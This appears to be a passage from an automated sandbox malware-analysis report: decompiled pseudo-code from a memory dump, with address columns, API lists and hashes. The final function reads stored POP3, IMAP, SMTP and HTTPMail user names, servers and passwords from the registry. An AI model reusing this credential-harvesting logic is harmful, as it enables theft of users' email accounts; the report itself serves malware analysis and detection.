						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t98 + 4), 0x3ee), 0);
					}
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					SetWindowTextA( *(_t98 + 4), E004019DA(_t100,  &_v268, 0x413450));
					SetDlgItemTextA( *(_t98 + 4), 0x3ea, _t98 + 0xc);
					SetDlgItemTextA( *(_t98 + 4), 0x3ec, _t98 + 0x10b);
					E00401000(_t98, __eflags);
					E0040649B(_t104,  *(_t98 + 4));
					goto L29;
				} else {
					_t67 = _t50 - 1;
					if(_t67 == 0) {
						_t68 = _a8;
						__eflags = _t68 - 1;
						if(_t68 != 1) {
							goto L29;
						} else {
							__eflags = _t68 >> 0x10;
							if(_t68 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t98 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t73 = _t67 - 0x27;
						if(_t73 == 0) {
							_t74 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t74;
							if(_a12 != _t74) {
								__eflags =  *0x418388;
								if( *0x418388 == 0) {
									goto L29;
								} else {
									_t75 = GetDlgItem( *(_t98 + 4), 0x3ee);
									__eflags = _a12 - _t75;
									if(_a12 != _t75) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t62 = GetSysColorBrush(0xf);
							}
						} else {
							_t78 = _t73 - 0xc8;
							if(_t78 == 0) {
								_t79 = _a12;
								_t109 = _t79 & 0x0000ffff;
								_v12.x = _t109;
								_v12.y = _t79 >> 0x10;
								_t81 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t81;
								_t82 = ChildWindowFromPoint( *(_t98 + 4), _t109);
								__eflags = _t82 - _a8;
								if(_t82 != _a8) {
									__eflags =  *0x418388;
									if( *0x418388 == 0) {
										goto L29;
									} else {
										_t83 = GetDlgItem( *(_t98 + 4), 0x3ee);
										_push(_v12.y);
										_t84 = ChildWindowFromPoint( *(_t98 + 4), _v12.x);
										__eflags = _t84 - _t83;
										if(_t84 != _t83) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x417b94, 0x67));
									goto L8;
								}
							} else {
								if(_t78 != 0) {
									L29:
									_t62 = 0;
									__eflags = 0;
								} else {
									_t89 = _a12;
									_t111 = _t89 & 0x0000ffff;
									_v12.x = _t111;
									_v12.y = _t89 >> 0x10;
									_t91 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t91;
									if(ChildWindowFromPoint( *(_t98 + 4), _t111) != _a8) {
										__eflags =  *0x418388;
										if( *0x418388 == 0) {
											goto L29;
										} else {
											_t93 = GetDlgItem( *(_t98 + 4), 0x3ee);
											_push(_v12.y);
											_t94 = ChildWindowFromPoint( *(_t98 + 4), _v12);
											__eflags = _t94 - _t93;
											if(_t94 != _t93) {
												goto L29;
											} else {
												_push(0x418388);
												goto L7;
											}
										}
									} else {
										_push(_t98 + 0x10b);
										L7:
										_push( *(_t98 + 4));
										E00406552();
										L8:
										_t62 = 1;
									}
								}
							}
						}
					}
				}
				return _t62;
			}





























                                                                                                                                                                  0x00401060
                                                                                                                                                                  0x00401060
                                                                                                                                                                  0x0040106c
                                                                                                                                                                  0x00401074
                                                                                                                                                                  0x00401076
                                                                                                                                                                  0x00401231
                                                                                                                                                                  0x00401238
                                                                                                                                                                  0x00401273
                                                                                                                                                                  0x0040123a
                                                                                                                                                                  0x00401253
                                                                                                                                                                  0x00401262
                                                                                                                                                                  0x00401262
                                                                                                                                                                  0x00401287
                                                                                                                                                                  0x0040128e
                                                                                                                                                                  0x004012aa
                                                                                                                                                                  0x004012c2
                                                                                                                                                                  0x004012d3
                                                                                                                                                                  0x004012d7
                                                                                                                                                                  0x004012df
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040107c
                                                                                                                                                                  0x0040107c
                                                                                                                                                                  0x0040107d
                                                                                                                                                                  0x004011fc
                                                                                                                                                                  0x004011ff
                                                                                                                                                                  0x00401203
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401209
                                                                                                                                                                  0x0040120c
                                                                                                                                                                  0x0040120f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401215
                                                                                                                                                                  0x0040121a
                                                                                                                                                                  0x00401226
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401226
                                                                                                                                                                  0x0040120f
                                                                                                                                                                  0x00401083
                                                                                                                                                                  0x00401083
                                                                                                                                                                  0x00401086
                                                                                                                                                                  0x004011ad
                                                                                                                                                                  0x004011af
                                                                                                                                                                  0x004011b2
                                                                                                                                                                  0x004011da
                                                                                                                                                                  0x004011e1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004011e7
                                                                                                                                                                  0x004011ef
                                                                                                                                                                  0x004011f1
                                                                                                                                                                  0x004011f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004011fa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004011fa
                                                                                                                                                                  0x004011f4
                                                                                                                                                                  0x004011b4
                                                                                                                                                                  0x004011b4
                                                                                                                                                                  0x004011b9
                                                                                                                                                                  0x004011c7
                                                                                                                                                                  0x004011cf
                                                                                                                                                                  0x004011cf
                                                                                                                                                                  0x0040108c
                                                                                                                                                                  0x0040108c
                                                                                                                                                                  0x00401091
                                                                                                                                                                  0x00401121
                                                                                                                                                                  0x0040112a
                                                                                                                                                                  0x00401138
                                                                                                                                                                  0x0040113b
                                                                                                                                                                  0x0040113e
                                                                                                                                                                  0x00401140
                                                                                                                                                                  0x00401143
                                                                                                                                                                  0x00401150
                                                                                                                                                                  0x00401152
                                                                                                                                                                  0x00401155
                                                                                                                                                                  0x00401171
                                                                                                                                                                  0x00401178
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040117e
                                                                                                                                                                  0x00401186
                                                                                                                                                                  0x00401188
                                                                                                                                                                  0x00401193
                                                                                                                                                                  0x00401195
                                                                                                                                                                  0x00401197
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040119d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040119d
                                                                                                                                                                  0x00401197
                                                                                                                                                                  0x00401157
                                                                                                                                                                  0x00401157
                                                                                                                                                                  0x00401166
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401166
                                                                                                                                                                  0x00401097
                                                                                                                                                                  0x00401099
                                                                                                                                                                  0x004012e5
                                                                                                                                                                  0x004012e5
                                                                                                                                                                  0x004012e5
                                                                                                                                                                  0x0040109f
                                                                                                                                                                  0x0040109f
                                                                                                                                                                  0x004010a8
                                                                                                                                                                  0x004010b6
                                                                                                                                                                  0x004010b9
                                                                                                                                                                  0x004010bc
                                                                                                                                                                  0x004010be
                                                                                                                                                                  0x004010c1
                                                                                                                                                                  0x004010d3
                                                                                                                                                                  0x004010ee
                                                                                                                                                                  0x004010f5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004010fb
                                                                                                                                                                  0x00401103
                                                                                                                                                                  0x00401105
                                                                                                                                                                  0x00401110
                                                                                                                                                                  0x00401112
                                                                                                                                                                  0x00401114
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040111a
                                                                                                                                                                  0x0040111a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040111a
                                                                                                                                                                  0x00401114
                                                                                                                                                                  0x004010d5
                                                                                                                                                                  0x004010db
                                                                                                                                                                  0x004010dc
                                                                                                                                                                  0x004010dc
                                                                                                                                                                  0x004010df
                                                                                                                                                                  0x004010e6
                                                                                                                                                                  0x004010e8
                                                                                                                                                                  0x004010e8
                                                                                                                                                                  0x004010d3
                                                                                                                                                                  0x00401099
                                                                                                                                                                  0x00401091
                                                                                                                                                                  0x00401086
                                                                                                                                                                  0x0040107d
                                                                                                                                                                  0x004012eb

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2998058495-0
                                                                                                                                                                  • Opcode ID: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                                                                                                                                                                  • Instruction ID: d9fb6b658f62cfbd3d3feccfc88cd7b26f9bda258aecb32a4b2b6428ade5212d
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                                                                                                                                                                  • Instruction Fuzzy Hash: 21619D31400248FBDF129F60DD89BAA7FA5EB04715F14C1B6F908BA2F1C7759A90DB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A88E, Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 285windowregistrystringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E0040A88E(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HMENU__* _t121;
				struct HWND__* _t122;
				intOrPtr _t128;
				int _t133;
				intOrPtr _t135;
				int _t149;
				void* _t166;
				char* _t174;
				void* _t178;
				void* _t185;
				intOrPtr _t194;
				void* _t197;
				void* _t198;
				intOrPtr _t200;
				intOrPtr _t201;
				void* _t202;
				int _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t213;

				_t213 = __eflags;
				_t208 = _t210 - 0x78;
				_t211 = _t210 - 0xb8;
				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
				 *((char*)(_t208 - 0x37)) = 1;
				 *(_t208 - 0x40) = 0;
				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
				 *((char*)(_t208 - 0x38)) = 0;
				 *((char*)(_t208 - 0x36)) = 0;
				 *((char*)(_t208 - 0x35)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 0x2c) = 1;
				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
				 *((char*)(_t208 - 0x24)) = 4;
				 *((char*)(_t208 - 0x23)) = 0;
				 *((char*)(_t208 - 0x22)) = 0;
				 *((char*)(_t208 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 - 0x18)) = 5;
				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
				 *((char*)(_t208 - 0x10)) = 4;
				 *((char*)(_t208 - 0xf)) = 0;
				 *((char*)(_t208 - 0xe)) = 0;
				 *((char*)(_t208 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 4) = 2;
				 *_t208 = 0x9c48;
				 *((char*)(_t208 + 4)) = 4;
				 *((char*)(_t208 + 5)) = 0;
				 *((char*)(_t208 + 6)) = 0;
				 *((char*)(_t208 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x10)) = 3;
				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
				 *((char*)(_t208 + 0x18)) = 4;
				 *((char*)(_t208 + 0x19)) = 0;
				 *((char*)(_t208 + 0x1a)) = 0;
				 *((char*)(_t208 + 0x1b)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x24)) = 0;
				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
				 *((char*)(_t208 + 0x2c)) = 4;
				 *((char*)(_t208 + 0x2d)) = 0;
				 *((char*)(_t208 + 0x2e)) = 0;
				 *((char*)(_t208 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x38)) = 6;
				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
				 *((char*)(_t208 + 0x40)) = 4;
				 *((char*)(_t208 + 0x41)) = 0;
				 *((char*)(_t208 + 0x42)) = 0;
				 *((char*)(_t208 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
				 *((char*)(_t208 + 0x54)) = 4;
				 *((char*)(_t208 + 0x55)) = 0;
				 *((char*)(_t208 + 0x56)) = 0;
				 *((char*)(_t208 + 0x57)) = 0;
				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
				asm("stosd");
				_t198 = 0x66;
				asm("stosd");
				_t121 = E00407D23(_t198);
				_t194 =  *((intOrPtr*)(_t208 + 0x70));
				 *(_t194 + 0x11c) = _t121;
				_t122 = SetMenu( *(_t194 + 0x108), _t121);
				__imp__#6(0x50000000, 0x41344f,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
				 *(_t194 + 0x114) = _t122;
				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x417b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
				E00402393( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x417b94, 0), 1);
				_t128 =  *((intOrPtr*)(_t194 + 0x370));
				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
				if(_t173 <= 0) {
					L3:
					_t201 =  *((intOrPtr*)(_t194 + 0x370));
					E0040A02E(_t201);
					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x417b94, 0x66));
					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
						E00409F9C(_t133, _t173, _t194, _t201);
					}
					_t202 = 0x68;
					 *((intOrPtr*)(_t194 + 0x154)) = E00407D23(_t202);
					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
						_t174 = 0x41344f;
					} else {
						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
							_t174 = 0;
						} else {
							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
						}
					}
					_push("/noloadsettings");
					_push(_t174);
					L00412072();
					if(_t135 == 0) {
						RegDeleteKeyA(0x80000001, 0x41344f);
					}
					E0040B031(_t194, 0);
					 *( *(_t194 + 0x36c)) = 1;
					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
					if( *0x418660 == 0) {
						E0040617C(0x418660);
						if((GetFileAttributesA(0x418660) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x418660);
						}
					}
					_t204 = strlen(0x418660);
					 *_t211 = "report.html";
					_t99 = strlen(??) + 1; // 0x1
					_t223 = _t204 + _t99 - 0x104;
					if(_t204 + _t99 >= 0x104) {
						 *((char*)(_t194 + 0x264)) = 0;
					} else {
						E004062B7(_t194 + 0x264, 0x418660, "report.html");
					}
					_push(1);
					_t178 = 0x30;
					E0040A175( *((intOrPtr*)(_t194 + 0x370)), _t178);
					E0040A175( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
					_t205 = _t194;
					 *(_t194 + 0x374) = _t149;
					E0040A3E9(0, 1, _t205, _t223);
					E00401E4A(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
					 *(_t208 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t207 = _t200 + 0xc;
					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
					do {
						_t173 =  *((intOrPtr*)(_t207 - 8));
						E0040492F( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
						_t211 = _t211 + 0x10;
						_t207 = _t207 + 0x14;
						_t82 = _t208 + 0x74;
						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
					} while ( *_t82 != 0);
					goto L3;
				}
			}





























                                                                                                                                                                  0x0040a88e
                                                                                                                                                                  0x0040a88f
                                                                                                                                                                  0x0040a893
                                                                                                                                                                  0x0040a89c
                                                                                                                                                                  0x0040a89f
                                                                                                                                                                  0x0040a8a7
                                                                                                                                                                  0x0040a8aa
                                                                                                                                                                  0x0040a8ad
                                                                                                                                                                  0x0040a8b0
                                                                                                                                                                  0x0040a8b3
                                                                                                                                                                  0x0040a8b9
                                                                                                                                                                  0x0040a8ba
                                                                                                                                                                  0x0040a8bb
                                                                                                                                                                  0x0040a8c2
                                                                                                                                                                  0x0040a8c9
                                                                                                                                                                  0x0040a8cd
                                                                                                                                                                  0x0040a8d0
                                                                                                                                                                  0x0040a8d3
                                                                                                                                                                  0x0040a8db
                                                                                                                                                                  0x0040a8dc
                                                                                                                                                                  0x0040a8dd
                                                                                                                                                                  0x0040a8e4
                                                                                                                                                                  0x0040a8eb
                                                                                                                                                                  0x0040a8ef
                                                                                                                                                                  0x0040a8f2
                                                                                                                                                                  0x0040a8f5
                                                                                                                                                                  0x0040a8fd
                                                                                                                                                                  0x0040a8fe
                                                                                                                                                                  0x0040a8ff
                                                                                                                                                                  0x0040a906
                                                                                                                                                                  0x0040a90d
                                                                                                                                                                  0x0040a911
                                                                                                                                                                  0x0040a914
                                                                                                                                                                  0x0040a917
                                                                                                                                                                  0x0040a91f
                                                                                                                                                                  0x0040a920
                                                                                                                                                                  0x0040a921
                                                                                                                                                                  0x0040a928
                                                                                                                                                                  0x0040a92f
                                                                                                                                                                  0x0040a933
                                                                                                                                                                  0x0040a936
                                                                                                                                                                  0x0040a939
                                                                                                                                                                  0x0040a941
                                                                                                                                                                  0x0040a942
                                                                                                                                                                  0x0040a943
                                                                                                                                                                  0x0040a946
                                                                                                                                                                  0x0040a94d
                                                                                                                                                                  0x0040a951
                                                                                                                                                                  0x0040a954
                                                                                                                                                                  0x0040a957
                                                                                                                                                                  0x0040a95f
                                                                                                                                                                  0x0040a960
                                                                                                                                                                  0x0040a961
                                                                                                                                                                  0x0040a968
                                                                                                                                                                  0x0040a96f
                                                                                                                                                                  0x0040a973
                                                                                                                                                                  0x0040a976
                                                                                                                                                                  0x0040a979
                                                                                                                                                                  0x0040a981
                                                                                                                                                                  0x0040a982
                                                                                                                                                                  0x0040a983
                                                                                                                                                                  0x0040a98a
                                                                                                                                                                  0x0040a991
                                                                                                                                                                  0x0040a995
                                                                                                                                                                  0x0040a998
                                                                                                                                                                  0x0040a99b
                                                                                                                                                                  0x0040a99e
                                                                                                                                                                  0x0040a9a7
                                                                                                                                                                  0x0040a9aa
                                                                                                                                                                  0x0040a9ab
                                                                                                                                                                  0x0040a9ac
                                                                                                                                                                  0x0040a9b1
                                                                                                                                                                  0x0040a9bb
                                                                                                                                                                  0x0040a9c1
                                                                                                                                                                  0x0040a9dc
                                                                                                                                                                  0x0040a9ee
                                                                                                                                                                  0x0040a9f4
                                                                                                                                                                  0x0040aa41
                                                                                                                                                                  0x0040aa79
                                                                                                                                                                  0x0040aa7e
                                                                                                                                                                  0x0040aa84
                                                                                                                                                                  0x0040aa8c
                                                                                                                                                                  0x0040aa98
                                                                                                                                                                  0x0040aa9b
                                                                                                                                                                  0x0040aac4
                                                                                                                                                                  0x0040aac4
                                                                                                                                                                  0x0040aacc
                                                                                                                                                                  0x0040aae7
                                                                                                                                                                  0x0040aaf3
                                                                                                                                                                  0x0040aaf5
                                                                                                                                                                  0x0040aaf5
                                                                                                                                                                  0x0040aafc
                                                                                                                                                                  0x0040ab02
                                                                                                                                                                  0x0040ab08
                                                                                                                                                                  0x0040ab11
                                                                                                                                                                  0x0040ab26
                                                                                                                                                                  0x0040ab13
                                                                                                                                                                  0x0040ab16
                                                                                                                                                                  0x0040ab22
                                                                                                                                                                  0x0040ab18
                                                                                                                                                                  0x0040ab1d
                                                                                                                                                                  0x0040ab1d
                                                                                                                                                                  0x0040ab16
                                                                                                                                                                  0x0040ab2b
                                                                                                                                                                  0x0040ab30
                                                                                                                                                                  0x0040ab31
                                                                                                                                                                  0x0040ab3a
                                                                                                                                                                  0x0040ab46
                                                                                                                                                                  0x0040ab46
                                                                                                                                                                  0x0040ab4f
                                                                                                                                                                  0x0040ab5a
                                                                                                                                                                  0x0040ab6c
                                                                                                                                                                  0x0040ab7d
                                                                                                                                                                  0x0040ab7f
                                                                                                                                                                  0x0040ab8d
                                                                                                                                                                  0x0040ab95
                                                                                                                                                                  0x0040ab95
                                                                                                                                                                  0x0040ab8d
                                                                                                                                                                  0x0040aba1
                                                                                                                                                                  0x0040aba3
                                                                                                                                                                  0x0040abaf
                                                                                                                                                                  0x0040abb3
                                                                                                                                                                  0x0040abb9
                                                                                                                                                                  0x0040abd4
                                                                                                                                                                  0x0040abbb
                                                                                                                                                                  0x0040abcb
                                                                                                                                                                  0x0040abd1
                                                                                                                                                                  0x0040abe0
                                                                                                                                                                  0x0040abe4
                                                                                                                                                                  0x0040abe5
                                                                                                                                                                  0x0040abfc
                                                                                                                                                                  0x0040ac06
                                                                                                                                                                  0x0040ac0e
                                                                                                                                                                  0x0040ac10
                                                                                                                                                                  0x0040ac16
                                                                                                                                                                  0x0040ac27
                                                                                                                                                                  0x0040ac43
                                                                                                                                                                  0x0040ac4a
                                                                                                                                                                  0x0040ac51
                                                                                                                                                                  0x0040ac6d
                                                                                                                                                                  0x0040aa9d
                                                                                                                                                                  0x0040aa9d
                                                                                                                                                                  0x0040aaa0
                                                                                                                                                                  0x0040aaa3
                                                                                                                                                                  0x0040aaab
                                                                                                                                                                  0x0040aab4
                                                                                                                                                                  0x0040aab9
                                                                                                                                                                  0x0040aabc
                                                                                                                                                                  0x0040aabf
                                                                                                                                                                  0x0040aabf
                                                                                                                                                                  0x0040aabf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aaa3

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407D23: LoadMenuA.USER32 ref: 00407D2B
                                                                                                                                                                    • Part of subcall function 00407D23: sprintf.MSVCRT ref: 00407D4E
                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040A9C1
                                                                                                                                                                  • #6.COMCTL32(50000000,0041344F,?,00000101), ref: 0040A9DC
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A9F4
                                                                                                                                                                  • LoadImageA.USER32 ref: 0040AA0A
                                                                                                                                                                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040AA34
                                                                                                                                                                  • CreateWindowExA.USER32 ref: 0040AA6A
                                                                                                                                                                  • LoadIconA.USER32 ref: 0040AAD9
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040AAE7
                                                                                                                                                                  • _stricmp.MSVCRT(0041344F,/noloadsettings), ref: 0040AB31
                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,0041344F), ref: 0040AB46
                                                                                                                                                                  • SetFocus.USER32(?,00000000), ref: 0040AB6C
                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00418660), ref: 0040AB85
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00418660), ref: 0040AB95
                                                                                                                                                                  • strlen.MSVCRT ref: 0040AB9C
                                                                                                                                                                  • strlen.MSVCRT ref: 0040ABAA
                                                                                                                                                                  • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AC06
                                                                                                                                                                    • Part of subcall function 0040492F: strlen.MSVCRT ref: 0040494C
                                                                                                                                                                    • Part of subcall function 0040492F: SendMessageA.USER32 ref: 00404970
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040AC51
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040AC64
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                                                                                                  • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                  • API String ID: 873469642-933021314
                                                                                                                                                                  • Opcode ID: f75555cb15c1b63825adbd58fa812571469ae2ca081b8c073a2cdb6d326835af
                                                                                                                                                                  • Instruction ID: e1998a72efec4b56c1f9895f5ce6fdd1159dce7011e853ef75bd655fd4d55b37
                                                                                                                                                                  • Opcode Fuzzy Hash: f75555cb15c1b63825adbd58fa812571469ae2ca081b8c073a2cdb6d326835af
                                                                                                                                                                  • Instruction Fuzzy Hash: DBB10071644388EFEB16CF74C845BDABFB5BF14304F00406AF644A7292C7B9A954CB5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004025C5, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                                                  			E004025C5(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t67;
				void* _t70;
				void* _t73;
				void* _t87;
				signed int _t90;
				void* _t92;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t114;

				_t114 = __fp0;
				_t92 = __ecx;
				_t103 = _t105 - 0x6c;
				_t106 = _t105 - 0x474;
				 *(_t103 + 0x4c) = "POP3 User Name";
				 *(_t103 + 0x50) = "IMAP User Name";
				 *(_t103 + 0x54) = "HTTPMail User Name";
				 *(_t103 + 0x58) = "SMTP USer Name";
				 *(_t103 + 0x1c) = "POP3 Server";
				 *(_t103 + 0x20) = "IMAP Server";
				 *(_t103 + 0x24) = "HTTPMail Server";
				 *(_t103 + 0x28) = "SMTP Server";
				 *(_t103 + 0x3c) = "POP3 Password2";
				 *(_t103 + 0x40) = "IMAP Password2";
				 *(_t103 + 0x44) = "HTTPMail Password2";
				 *(_t103 + 0x48) = "SMTP Password2";
				 *(_t103 + 0x2c) = "POP3 Port";
				 *(_t103 + 0x30) = "IMAP Port";
				 *(_t103 + 0x34) = "HTTPMail Port";
				 *(_t103 + 0x38) = "SMTP Port";
				 *(_t103 + 0x5c) = "POP3 Secure Connection";
				 *(_t103 + 0x60) = "IMAP Secure Connection";
				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
				 *(_t103 + 0x68) = "SMTP Secure Connection";
				_t90 = 0;
				do {
					 *(_t103 - 0x64) = 0;
					memset(_t103 - 0x63, 0, 0x7f);
					_push(_t103 - 0x64);
					_t96 = _t90 << 2;
					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
					_push( *((intOrPtr*)(_t103 + 0x78)));
					_t58 = 0x7f;
					_t59 = E0040F1F1(_t58, _t92);
					_t106 = _t106 + 0x18;
					if(_t59 == 0) {
						E00402197(_t103 - 0x408);
						strcpy(_t103 - 0x1f4, _t103 - 0x64);
						_t100 =  *((intOrPtr*)(_t103 + 0x78));
						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
						_t34 = _t90 + 1; // 0x1
						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
						_push(_t103 - 0x2f8);
						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
						_push(_t100);
						_t67 = 0x7f;
						E0040F1F1(_t67, _t92);
						_push(_t103 - 0x3fc);
						_push("SMTP Display Name");
						_push(_t100);
						_t70 = 0x7f;
						E0040F1F1(_t70, _t92);
						_push(_t103 - 0x378);
						_push("SMTP Email Address");
						_push(_t100);
						_t73 = 0x7f;
						E0040F1F1(_t73, _t92);
						_t108 = _t106 + 0x2c;
						if(_t90 != 3) {
							_push(_t103 - 0x278);
							_push("SMTP Server");
							_push(_t100);
							_t87 = 0x7f;
							E0040F1F1(_t87, _t92);
							_t108 = _t108 + 0xc;
						}
						E0040F1CA(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
						E0040F1CA(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
						_t106 = _t108 + 0x18;
						_t101 =  *((intOrPtr*)(_t103 + 0x74));
